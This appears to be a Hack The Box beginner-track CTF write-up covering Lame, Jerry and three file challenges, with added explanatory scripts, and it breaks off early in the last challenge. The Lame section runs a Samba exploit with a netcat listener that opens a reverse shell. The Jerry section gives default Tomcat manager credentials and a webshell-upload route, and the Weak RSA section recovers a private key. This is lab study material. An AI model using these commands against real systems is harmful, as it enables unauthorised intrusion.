hack the box - beginner track
a short run of the CTF
1 - Box Lame
- OS: Linux
- Target IP: 10.10.10.3
# nmap scan
> nmap -sV -sC -vv 10.10.10.3
Discovered open port 21/tcp on 10.10.10.3
Discovered open port 445/tcp on 10.10.10.3
Discovered open port 22/tcp on 10.10.10.3
Discovered open port 139/tcp on 10.10.10.3
# probe anonymous ftp login
> ncftp -u anonymous 10.10.10.3
...
Login successful.
# --> sadly no items found
# check samba shares
# lists public shares on a server
> smbclient -L 10.10.10.3 -U%
# show a tree diagram of all the shares
> smbtree -b -N
# full smb enumeration
> enum4linux -a 10.10.10.3
# show details like permissions
> smbmap -H 10.10.10.3
# --> we got rw access on "/tmp"
# connect with user "anonymous" to "/tmp" share
> smbclient -N //10.10.10.3/tmp
# --> looking around but no cool stuff in there
# checking for CVEs
# nmap says
21/tcp open ftp syn-ack ttl 63 vsftpd 2.3.4
22/tcp open ssh syn-ack ttl 63 OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0)
445/tcp open netbios-ssn syn-ack ttl 63 Samba smbd 3.0.20-Debian
# using searchsploit
> searchsploit vsftpd 2.3.4
> searchsploit Openssh 4.7p1
> searchsploit Samba 3.0
# --> got a lot of CVEs
# vsftpd
> searchsploit -m unix/remote/49757.py
# small insert - shorten the route by using:
# "https://github.com/amriunix/CVE-2007-2447"
# usage: python usermap_script.py <RHOST> <RPORT> <LHOST> <LPORT>
# after running this script we got root :)
> nc -lnvp 555
> python ./usermap_script.py 10.10.10.3 139 10.10.14.14 555
2 - Find The Easy Pass
- Challenge: File
- Filetype: Exe
# download and extract password protected zip file
> unzip -P hackthebox Find\ The\ Easy\ Pass.zip
# inspect the exe
> file EasyPass.exe
EasyPass.exe: PE32 executable (GUI) Intel 80386, for MS Windows
# get a lot more info
> rabin2 -I EasyPass.exe
arch x86
baddr 0x400000
binsz 402432
bintype pe
bits 32
canary false
retguard false
class PE32
cmp.csum 0x00063785
compiled Sat Jun 20 00:22:17 1992
crypto false
endian little
havecode true
...
# deeper inspection with "objdump"
> objdump -s EasyPass.exe
# --> got a lot of info, let's play a little bit
> objdump -s EasyPass.exe | grep -i 'pass\|valid\|return\|wrong\|0x'
40d970 c3000000 ffffffff 02000000 30780000 ............0x..
428d10 38584500 e48a4200 30584500 dc8a4200 8XE...B.0XE...B.
42ad00 00000028 000c5061 7373776f 72644368 ...(..PasswordCh
454200 57726f6e 67205061 7373776f 72642100 Wrong Password!.
45e5d0 68306c30 70307430 78307c30 80308430 h0l0p0t0x0|0.0.0
460860 50305430 58307030 90309830 9c30a030 P0T0X0p0.0.0.0.0
462a60 25303f30 43304730 4c305830 5c308630 %0?0C0G0L0X0\0.0
462ef0 48304c30 50305430 58305c30 60306430 H0L0P0T0X0\0`0d0
462f00 68306c30 70307430 78307c30 80308430 h0l0p0t0x0|0.0.0
4682b0 65722050 61737377 6f726400 00055445 er Password...TE
468330 65636b20 50617373 776f7264 08546162 eck Password.Tab
# --> maybe the "Wrong Password" string will put us on the right path?
454200 57726f6e 67205061 7373776f 72642100 Wrong Password!.
# using rabin2 with the "-z" option for a really nice table view
> rabin2 -z EasyPass.exe | grep -i pass
469 0x000622ad 0x004682ad 14 15 .rsrc ascii Enter Password
481 0x0006232e 0x0046832e 23 24 .rsrc ascii Check Password\bTabOrder
# using a decompiler to get more info - radare2 is a crazy cmd line tool ;)
> radare2 EasyPass.exe
-- THE ONLY WINNING MOVE IS NOT TO PLAY.
[0x00454450]> aa # analyze the binary
[x] Analyze all flags starting with sym. and entry0 (aa)
[0x00454450]> aaa # analyze the binary a bit more
[Invalid function name 'sub.user32.dll_GetWindowThreadProcessId' at 0x0040699c
Invalid function name 'sub.user32.dll_GetWindow' at 0x00406964
[x] Analyze function calls (aac)
[x] Analyze len bytes of instructions for references (aar)
[x] Check for vtables
[x] Type matching analysis for all functions (aaft)
[x] Propagate noreturn information
[x] Use -AA or aaaa to perform additional experimental analysis.
[0x00454450]> aav # analyzing program structure and discovering functions
[x] Finding xrefs in noncode section with anal.in=io.maps
[x] Analyze value pointers (aav)
[x] Value from 0x00454600 to 0x00455000 (aav)
[x] 0x00454600-0x00455000 in 0x454600-0x455000 (aav)
[x] 0x00454600-0x00455000 in 0x401000-0x454600 (aav)
[x] Value from 0x00401000 to 0x00454600 (aav)
[x] 0x00401000-0x00454600 in 0x454600-0x455000 (aav)
[x] 0x00401000-0x00454600 in 0x401000-0x454600 (aav)
[0x00454450]> s entry0 # get on the entry point of the program
[0x00454450]> izz | grep -i pass # search again for the buzzword "pass"
2808 0x0002a105 0x0042ad05 13 14 CODE ascii \fPasswordChar
5483 0x00053600 0x00454200 15 16 CODE ascii Wrong Password!
7072 0x000622ad 0x004682ad 14 15 .rsrc ascii Enter Password
7084 0x0006232e 0x0046832e 23 24 .rsrc ascii Check Password\bTabOrder
[0x00454450]> s 0x00454200 # seek to the "Wrong Password" string we found above
[0x00454450]> V # starts the visual mode - "p" and "P" switch the view mode
# --> if we scroll up a bit we find a string "Good Job. Congratulations"
- offset - 0 1 2 3 4 5 6 7 8 9 A B C D E F 0123456789ABCDEF comment
0x004541d0 2100 0000 ffff ffff 1900 0000 476f 6f64 !...........Good ; aav.0x004541d0 ; aav.0x004541dc
0x004541e0 204a 6f62 2e20 436f 6e67 7261 7475 6c61 Job. Congratula
0x004541f0 7469 6f6e 7300 0000 ffff ffff 0f00 0000 tions...........
0x00454200 5772 6f6e 6720 5061 7373 776f 7264 2100 Wrong Password!. ; aav.0x00454200
# we need to find the reference "0x004541dc" from the comment section
[0x0045412b]> axt 0x4541dc # (A cross(X)-reference To)
(nofunc) 0x454138 [DATA] mov eax, aav.0x004541dc
[0x00454450]> V # enter the visual mode again
# let's change the view to "[xaDvc]" with uppercase "P" and scroll to "0x00454138"
# now we see the called function "call fcn.00427a30"
0x00454138 b8dc414500 mov eax, aav.0x004541dc ; "Good Job. Congratulations"
0x0045413d e8ee38fdff call fcn.00427a30 ;[1]
0x00454142 eb0a jmp 0x45414e
; CODE XREF from aav.0x00454070 @ +0xc6
0x00454144 b800424500 mov eax, aav.0x00454200 ; "Wrong Password!"
0x00454149 e8e238fdff call fcn.00427a30 ;[1]
# the function is called twice - once for a rejected and once for an accepted password
# if we scroll further up we see repeated calls to "fcn.004042b4" - here we have our password :)
0x00454093 ba88414500 mov edx, aav.0x00454188 ; "f"
0x00454098 e81702fbff call fcn.004042b4 ;[1]
0x0045409d 8d45f4 lea eax, [ebp - 0xc]
0x004540a0 ba94414500 mov edx, aav.0x00454194 ; "o"
0x004540a5 e80a02fbff call fcn.004042b4 ;[1]
0x004540aa 8d45f0 lea eax, [ebp - 0x10]
0x004540ad baa0414500 mov edx, aav.0x004541a0 ; "r"
0x004540b2 e8fd01fbff call fcn.004042b4 ;[1]
0x004540b7 8d45ec lea eax, [ebp - 0x14]
0x004540ba baac414500 mov edx, aav.0x004541ac ; "t"
0x004540bf e8f001fbff call fcn.004042b4 ;[1]
; CODE XREF from aav.0x00454050 @ +0x5
0x004540c4 8d45e8 lea eax, [ebp - 0x18]
0x004540c7 baa0414500 mov edx, aav.0x004541a0 ; "r"
0x004540cc e8e301fbff call fcn.004042b4 ;[1]
0x004540d1 8d45e4 lea eax, [ebp - 0x1c]
0x004540d4 bab8414500 mov edx, aav.0x004541b8 ; "a"
0x004540d9 e8d601fbff call fcn.004042b4 ;[1]
0x004540de 8d45e0 lea eax, [ebp - 0x20]
0x004540e1 bac4414500 mov edx, aav.0x004541c4 ; "n"
0x004540e6 e8c901fbff call fcn.004042b4 ;[1]
0x004540eb 8d45dc lea eax, [ebp - 0x24]
0x004540ee bad0414500 mov edx, aav.0x004541d0 ; "!"
0x004540f3 e8bc01fbff call fcn.004042b4 ;[1]
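Instead of reading the eight pairs by hand, the constants handed to fcn.004042b4 can be collected from the listing itself. The script below is an added example, not part of the original writeup or of radare2: it parses the disassembly excerpt above (embedded as a constructed sample), keeps each `mov edx` string comment whose next call goes to fcn.004042b4, and joins the characters in program order.

```python
import re

# Constructed sample: the radare2 listing shown above, trimmed to one
# instruction per line (the lea lines between the pairs are dropped).
LISTING = """
0x00454093 ba88414500 mov edx, aav.0x00454188 ; "f"
0x00454098 e81702fbff call fcn.004042b4 ;[1]
0x004540a0 ba94414500 mov edx, aav.0x00454194 ; "o"
0x004540a5 e80a02fbff call fcn.004042b4 ;[1]
0x004540ad baa0414500 mov edx, aav.0x004541a0 ; "r"
0x004540b2 e8fd01fbff call fcn.004042b4 ;[1]
0x004540ba baac414500 mov edx, aav.0x004541ac ; "t"
0x004540bf e8f001fbff call fcn.004042b4 ;[1]
; CODE XREF from aav.0x00454050 @ +0x5
0x004540c7 baa0414500 mov edx, aav.0x004541a0 ; "r"
0x004540cc e8e301fbff call fcn.004042b4 ;[1]
0x004540d4 bab8414500 mov edx, aav.0x004541b8 ; "a"
0x004540d9 e8d601fbff call fcn.004042b4 ;[1]
0x004540e1 bac4414500 mov edx, aav.0x004541c4 ; "n"
0x004540e6 e8c901fbff call fcn.004042b4 ;[1]
0x004540ee bad0414500 mov edx, aav.0x004541d0 ; "!"
0x004540f3 e8bc01fbff call fcn.004042b4 ;[1]
"""

# "mov edx, <ptr> ; "<text>"": capture the instruction address and the string r2 resolved.
MOV_RE = re.compile(r'^(0x[0-9a-f]+)\s+\S+\s+mov edx, \S+\s*;\s*"([^"]*)"')
CALL_RE = re.compile(r'^0x[0-9a-f]+\s+\S+\s+call (fcn\.[0-9a-f]+)')

def recover_string(listing, sink="fcn.004042b4"):
    """Collect (address, text) for every constant passed in edx to `sink`
    and return them together with the characters joined in program order."""
    pieces, pending = [], None
    for line in listing.strip().splitlines():
        m = MOV_RE.match(line)
        if m:
            pending = (m.group(1), m.group(2))
            continue
        c = CALL_RE.match(line)
        if c and pending is not None:
            if c.group(1) == sink:
                pieces.append(pending)
            pending = None          # any other call consumes the argument
    return pieces, "".join(text for _, text in pieces)

if __name__ == "__main__":
    pieces, secret = recover_string(LISTING)
    print(len(pieces), "characters handed to fcn.004042b4 ->", secret)
```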
3 - Weak RSA
- Challenge: File
- Filetype: Public Key
# download and extract password protected zip file
> unzip -P hackthebox Weak\ RSA.zip
# we've got 2 files
flag.enc
key.pub
# let's see what's in key.pub
> cat key.pub
-----BEGIN PUBLIC KEY-----
MIIBHzANBgkqhkiG9w0BAQEFAAOCAQwAMIIBBwKBgQMwO3kPsUnaNAbUlaubn7ip
4pNEXjvUOxjvLwUhtybr6Ng4undLtSQPCPf7ygoUKh1KYeqXMpTmhKjRos3xioTy
23CZuOl3WIsLiRKSVYyqBc9d8rxjNMXuUIOiNO38ealcR4p44zfHI66INPuKmTG3
RQP/6p5hv1PYcWmErEeDewKBgGEXxgRIsTlFGrW2C2JXoSvakMCWD60eAH0W2PpD
qlqqOFD8JA5UFK0roQkOjhLWSVu8c6DLpWJQQlXHPqP702qIg/gx2o0bm4EzrCEJ
4gYo6Ax+U7q6TOWhQpiBHnC0ojE8kUoqMhfALpUaruTJ6zmj8IA1e1M6bMqVF8sr
lb/N
-----END PUBLIC KEY-----
# okay - good documentation about SSL keys is in the Debian wiki
# see: https://wiki.debian.org/SSLkeys
# let's try "RsaCtfTool" and dump the key parameters
> rsactftool --dumpkey --key key.pub
n: 5731778245796309116684692727125478654435566540861901047227955\
0975689167002325903127543350912148103033159856937938350592831549\
5462888788593695945321417676298471525243254143375622365552296949\
4139206792905357171723195620643089373425674836904865928683527630\
21360051776130919666984258847567032959931761686072492923
e: 6818092863128414721282050719260573463203552413113993861806957\
5375591806315288775310503696874509130847529572462608728019290710\
1496613002461380365793420795804347773441112454951879278811321383\
5795874497424336596220483508975398766739551168282939127671435958\
2055290140617797814443530797154040685978229936907206605
# okay, let's try to recover the private key from the public key
> rsactftool --publickey ./key.pub --private
private argument is not set, the private key will \
not be displayed, even if recovered.
[*] Testing key key.pub.
# maybe an error caused by missing dependencies
# I've cloned the git repo and installed the requirements
> pip3 install -r "requirements.txt"
# this one caused trouble
# issue is already closed
> pip uninstall PyCrypto
> pip uninstall PyCryptodome
> pip install PyCryptodome
# after another try - no results - maybe a bug...
# I've tried a fork of the tool
> git clone https://github.com/daedalus/RsaCtfTool
> python RsaCtfTool/RsaCtfTool.py --publickey ./key.pub --private
# bingo :)
Private key :
-----BEGIN RSA PRIVATE KEY-----
...
-----END RSA PRIVATE KEY-----
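Why a tool can recover the private key here: e is almost as large as n, the usual sign of a tiny private exponent d, and Wiener's attack recovers d from the convergents of e/n. The following is an added example, not part of the writeup or of RsaCtfTool: a self-contained Wiener implementation run against the n and e dumped above, with a constructed message value (42) as the round-trip check.

```python
from math import isqrt

# n and e exactly as dumped by rsactftool above (the wrapped lines joined).
N = int("5731778245796309116684692727125478654435566540861901047227955"
        "0975689167002325903127543350912148103033159856937938350592831549"
        "5462888788593695945321417676298471525243254143375622365552296949"
        "4139206792905357171723195620643089373425674836904865928683527630"
        "21360051776130919666984258847567032959931761686072492923")
E = int("6818092863128414721282050719260573463203552413113993861806957"
        "5375591806315288775310503696874509130847529572462608728019290710"
        "1496613002461380365793420795804347773441112454951879278811321383"
        "5795874497424336596220483508975398766739551168282939127671435958"
        "2055290140617797814443530797154040685978229936907206605")

def convergents(num, den):
    """Yield the convergents h/k of the continued fraction of num/den."""
    h0, h1, k0, k1 = 0, 1, 1, 0
    while den:
        a, num, den = num // den, den, num % den
        h0, h1 = h1, a * h1 + h0
        k0, k1 = k1, a * k1 + k0
        yield h1, k1

def wiener(e, n):
    """Wiener's attack: when d < n^(1/4)/3, k/d is a convergent of e/n. Each
    candidate is tested by solving x^2 - (n - phi + 1)x + n = 0 for p and q.
    Returns (d, p, q), or None when the key is not Wiener-weak."""
    for k, d in convergents(e, n):
        if k == 0 or (e * d - 1) % k:
            continue
        phi = (e * d - 1) // k
        s = n - phi + 1                   # p + q
        disc = s * s - 4 * n
        if disc < 0:
            continue
        r = isqrt(disc)
        if r * r == disc and (s + r) % 2 == 0:
            p, q = (s + r) // 2, (s - r) // 2
            if p * q == n:
                return d, p, q
    return None

def check_roundtrip(e, n, d, m=42):
    """Constructed sanity check: m encrypted with e must decrypt with d."""
    return pow(pow(m, e, n), d, n) == m

if __name__ == "__main__":
    d, p, q = wiener(E, N)
    print(f"d is {d.bit_length()} bits for a {N.bit_length()}-bit n;",
          "roundtrip ok:", check_roundtrip(E, N, d))
```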
# lets decrypt the file
> openssl rsautl \
-decrypt \
-in ./flag.enc \
-out ./flag.txt \
-inkey ./key.priv
# woohoo - we've got the flag xD
4 - Jerry
- OS: Windows
- Target IP: 10.10.10.95
# nmap scan
> nmap -sV -sC -vv 10.10.10.95
Discovered open port 8080/tcp on 10.10.10.95
# port 8080 - apache tomcat
8080/tcp open http syn-ack ttl 127 Apache Tomcat/Coyote JSP engine 1.1
|_http-favicon: Apache Tomcat
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache-Coyote/1.1
|_http-title: Apache Tomcat/7.0.88
# check the searchsploit db for CVEs
> searchsploit tomcat 7.0.88
----------------------------------------------------------------------------- ---------------------------------
Exploit Title | Path
----------------------------------------------------------------------------- ---------------------------------
Apache Tomcat < 9.0.1 (Beta) / < 8.5.23 / < 8.0.47 / < 7.0.8 - JSP Upload By | jsp/webapps/42966.py
Apache Tomcat < 9.0.1 (Beta) / < 8.5.23 / < 8.0.47 / < 7.0.8 - JSP Upload By | windows/webapps/42953.txt
----------------------------------------------------------------------------- ---------------------------------
# get the python exploit
> searchsploit -m 42966
# check the exploit
./cve-2017-12617.py [options]
options:
-u ,--url [::] check target url if it's vulnerable
-p,--pwn [::] generate webshell and upload it
-l,--list [::] hosts list
# run check first
> python 42966.py -u 10.10.10.95:8080
requests.exceptions.InvalidSchema: No connection adapters were found for '10.10.10.95:8080
# get the txt file
> searchsploit -m 42953
> cat 42953
E-DB Note: https://www.alphabot.com/security/blog/2017/java/Apache-Tomcat-RCE-CVE-2017-12617.html
# okay, the exploit PUTs the JSP from this file onto the server and then requests its URL
# HTTP PUT has to be enabled on the server
# this has to be done on the admin interface - let's check the interface
> nikto -h 10.10.10.95:8080
...
+ /examples/servlets/index.html: Apache Tomcat default JSP pages present.
+ OSVDB-3720: /examples/jsp/snp/snoop.jsp: Displays information about page retrievals, including other users.
+ Default account found for 'Tomcat Manager Application' at /manager/html (ID 'tomcat', PW 's3cret'). Apache Tomcat.
+ /host-manager/html: Default Tomcat Manager / Host Manager interface found
+ /manager/html: Tomcat Manager / Host Manager interface found (pass protected)
...
# default account
ID: tomcat
PW: s3cret
# let's try to log in to the manager app
> elinks 10.10.10.95:8080/manager/html
# bingo :)
Tomcat Web Application Manager
┌────────────┬───────────┐
│Message: │OK │
└────────────┴───────────┘
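Both conditions this section relies on, HTTP PUT accepted by the DefaultServlet (its readonly init-param set to false, the precondition for CVE-2017-12617) and a shipped example account holding a manager role, live in two files under Tomcat's conf/ directory. As an added defender-side check that is not part of the writeup or of Tomcat, this script audits constructed copies of web.xml and tomcat-users.xml for exactly those two findings; the DefaultServlet class name and the init-param name are Tomcat's real ones, the sample contents are made up.

```python
import xml.etree.ElementTree as ET

# Constructed samples modelled on conf/web.xml and conf/tomcat-users.xml (xmlns omitted).
WEB_XML = """<web-app>
  <servlet>
    <servlet-name>default</servlet-name>
    <servlet-class>org.apache.catalina.servlets.DefaultServlet</servlet-class>
    <init-param><param-name>readonly</param-name><param-value>false</param-value></init-param>
  </servlet>
</web-app>"""
TOMCAT_USERS = """<tomcat-users>
  <role rolename="manager-gui"/>
  <user username="tomcat" password="s3cret" roles="manager-gui,admin-gui"/>
</tomcat-users>"""
DEFAULT_CREDS = {("tomcat", "s3cret")}   # the shipped example account nikto reported above
def _local(tag):
    return tag.rsplit("}", 1)[-1]        # drop any {namespace} prefix from a tag name

def audit_web_xml(xml_text):
    """Flag DefaultServlet definitions with readonly=false (HTTP PUT/DELETE accepted)."""
    findings = []
    for servlet in ET.fromstring(xml_text).iter():
        if _local(servlet.tag) != "servlet":
            continue
        cls, params = "", {}
        for el in servlet.iter():
            if _local(el.tag) == "servlet-class":
                cls = (el.text or "").strip()
            elif _local(el.tag) == "init-param":
                kv = {_local(c.tag): (c.text or "").strip() for c in el}
                params[kv.get("param-name")] = kv.get("param-value")
        if cls.endswith("DefaultServlet") and params.get("readonly", "true").lower() == "false":
            findings.append("DefaultServlet readonly=false: HTTP PUT/DELETE accepted")
    return findings

def audit_tomcat_users(xml_text):
    """Flag well-known default accounts that hold any manager-* role."""
    findings = []
    for user in ET.fromstring(xml_text).iter():
        if _local(user.tag) != "user":
            continue
        name, pw = user.get("username"), user.get("password")
        roles = {r.strip() for r in (user.get("roles") or "").split(",")}
        if (name, pw) in DEFAULT_CREDS and any(r.startswith("manager-") for r in roles):
            findings.append(f"default credentials {name}:{pw} hold {sorted(roles)}")
    return findings

if __name__ == "__main__":
    for f in audit_web_xml(WEB_XML) + audit_tomcat_users(TOMCAT_USERS):
        print("[!]", f)
```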
5 - You Know 0xDiablos
- Challenge: File
- Filetype: ?
# download and extract password protected zip file
> unzip -P hackthebox You\ know\ 0xDiablos.zip
Archive: You know 0xDiablos.zip
skipping: vuln need PK compat. v5.1 (can do v4.6)
# okay, this won't work - next try
> 7z x You\ know\ 0xDiablos.zip -phackthebox
Everything is Ok
# we've got a file called "vuln" - let's check what this is
> cat vuln
ELF484
...
tii libc.so.6_IO_stdin_usedexitfopenputsprintffgetsstdoutsetresgidgetegidsetvbuf__libc_start_mainGLIBC_2.1GLIBC_2.0__gmon_start__ii
...
[^_]ÍvË,$_[rflag.txtHurry up and try in on server side.You know who are 0xDiablos: P
...
GCC: (Debian 8.3.0-19) 8.3.0
# nice - looks like unformatted C code or something that can be compiled with GCC